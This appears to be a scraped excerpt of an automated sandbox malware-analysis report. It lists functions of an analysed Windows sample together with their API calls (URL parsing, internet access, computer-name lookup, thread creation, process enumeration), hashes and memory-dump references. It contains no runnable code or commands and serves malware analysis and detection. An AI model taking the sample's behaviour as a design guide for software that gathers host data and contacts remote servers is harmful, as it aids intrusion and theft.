                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1274457161-0
                                                                                                                                                                                                                                                  • Opcode ID: c09bd2fe11c1348f47e017cb7b041520fc743fed67941c6b7e3336a6be8fbed0
                                                                                                                                                                                                                                                  • Instruction ID: 9d1ca6733fe292c31276a17a668bcecf696b10a7d1d66101ed332df4bee839c5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c09bd2fe11c1348f47e017cb7b041520fc743fed67941c6b7e3336a6be8fbed0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D11E1F2A002549FD700EF25AC417993BE5AB95315F19403EF809D7341E779DA428BA6
                                                                                                                                                                                                                                                  Function 00406BE0 Relevance: 7.6, APIs: 5, Instructions: 54stringnetworkCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1274457161-0
                                                                                                                                                                                                                                                  • Opcode ID: 38a59c435b2d45f420b464d8d40ae8dc3af5eaaf409ae4e48b30047349412896
                                                                                                                                                                                                                                                  • Instruction ID: 80d2045ad2f8593c330baddbf277162730afe79b108fe80333406e261d85fc85
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38a59c435b2d45f420b464d8d40ae8dc3af5eaaf409ae4e48b30047349412896
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D01A5F1A002489FD700EF25EC41BAE77E8EB99709F11402EF809D7341D774DA058B66
                                                                                                                                                                                                                                                  Function 0041A90D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0041A92E
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00407382: lstrlenA.KERNEL32(00000000,?,?,?,?,?), ref: 004073FA
                                                                                                                                                                                                                                                    • Part of subcall function 00407382: StrCmpCA.SHLWAPI(?,0042EEFC,0042EEFC,0042EEFC,0042EEFC,?,?,00000000,00000000), ref: 00407449
                                                                                                                                                                                                                                                    • Part of subcall function 00407382: InternetOpenA.WININET ref: 0040747C
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?), ref: 0041A9F9
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcpylstrlen$InternetOpen
                                                                                                                                                                                                                                                  • String ID: ERROR
                                                                                                                                                                                                                                                  • API String ID: 3860179324-2861137601
                                                                                                                                                                                                                                                  • Opcode ID: 9db7e4bd71a96f2ad96fee4485a029e76f8f81f0a0a3d14fd4dcbb05e52f5b74
                                                                                                                                                                                                                                                  • Instruction ID: 280cb0089ae8515307c330337300684973a3070d8c525834bcac429b90799bd2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9db7e4bd71a96f2ad96fee4485a029e76f8f81f0a0a3d14fd4dcbb05e52f5b74
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 593152B5D012099FCB01EF65C982ADEBBF5BF08314F00451AE815A7291DB34BA95CF95
                                                                                                                                                                                                                                                  Function 0041797D Relevance: 4.6, APIs: 3, Instructions: 112sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateObjectSingleSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 309549813-0
                                                                                                                                                                                                                                                  • Opcode ID: d452bcfcc1377c3e87c60ca12b82fb9f930b46db966c0f9d46f134da2ab8ecc5
                                                                                                                                                                                                                                                  • Instruction ID: ea3f199f5e230162cc47f9fcea8af2023e6e25e0fd3ef7ab80fb325c08834ad3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d452bcfcc1377c3e87c60ca12b82fb9f930b46db966c0f9d46f134da2ab8ecc5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 634150B92143048FC705EF65D8869EE77EABF85345F00882EF855C3291DF389A48CBA5
                                                                                                                                                                                                                                                  Function 00413DBF Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0040128A,?,004315E7,?,004315DB,?,004315E4,?,004315E1,?,004315DE,?,004315DB), ref: 00413DC2
                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,0040128A,?,004315E7,?,004315DB,?,004315E4,?,004315E1,?,004315DE), ref: 00413DD1
                                                                                                                                                                                                                                                  • GetComputerNameA.KERNEL32(00000000), ref: 00413DDF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4203777966-0
                                                                                                                                                                                                                                                  • Opcode ID: e87addc3917c1582652ae1521c80a92d529d285b71a0c17ec3e8cc84417c586a
                                                                                                                                                                                                                                                  • Instruction ID: f11edcf30a3937a6bf13aa21ee565a1a4d2718e968f7f5cc493714258eaccb72
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e87addc3917c1582652ae1521c80a92d529d285b71a0c17ec3e8cc84417c586a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AD017B17003206FE6209B2ABC0CF873AACEFC9B61B990070FC05C3250D3348846C6A9
                                                                                                                                                                                                                                                  Function 0040106E Relevance: 4.5, APIs: 3, Instructions: 14memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1103761159-0
                                                                                                                                                                                                                                                  • Opcode ID: 5ee9d7473c3924204ca57906dc96219f516d74c2ff55c0a1b6b29943125a55b7
                                                                                                                                                                                                                                                  • Instruction ID: cbeecf13432bd86b07881f9954f5d2781a3b91bd5f6aa0d8a48ab97a10eed13d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ee9d7473c3924204ca57906dc96219f516d74c2ff55c0a1b6b29943125a55b7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EE0B6709087408AE310BF789A09329BAF0BB54702F80467AEC8591165EB7845998A9B
                                                                                                                                                                                                                                                  Function 00401011 Relevance: 3.8, APIs: 3, Instructions: 40memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32 ref: 00401024
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040104A
                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 00401064
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Virtual$AllocFreememset
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3122926387-0
                                                                                                                                                                                                                                                  • Opcode ID: a0a013b6774e571c5b65a47fc1d3d360eda1f497b9a4925a01a31c340fd8a1f6
                                                                                                                                                                                                                                                  • Instruction ID: 953efe50e1cbbb812f06cc3e62367a8be46cf4bdbcb976bc8bbce204aaafe815
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0a013b6774e571c5b65a47fc1d3d360eda1f497b9a4925a01a31c340fd8a1f6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4DF0273268267467E12032383C09FBBA398AF02B54F905136FD84F32A1E651595541E8
                                                                                                                                                                                                                                                  Function 00AD4FDA Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00AD5002
                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 00AD5022
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3467949827.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ad0000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                  • Instruction ID: f0af9b9a5a8a131bdee05a221d54adf9b036d57fe12a4eaa96b353ae9b348eca
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71F096315107157FD7203BF5A98DF6EB6E8AF4D725F10052AE643D12C0DB70EC4546A1
                                                                                                                                                                                                                                                  Function 00B00E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000400,?,?,00B00223,?,?), ref: 00B00E19
                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,00B00223,?,?), ref: 00B00E1E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction ID: ce57d29500d96b33ae73fd294b2d0a5fe4e8542c7741799118836566479eeeda
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49D01232645228B7DB003A94DC09BCEBF5CDF09BA2F008461FB0DE9080CBB09A4046EA
                                                                                                                                                                                                                                                  Function 00414AE0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00414B18
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
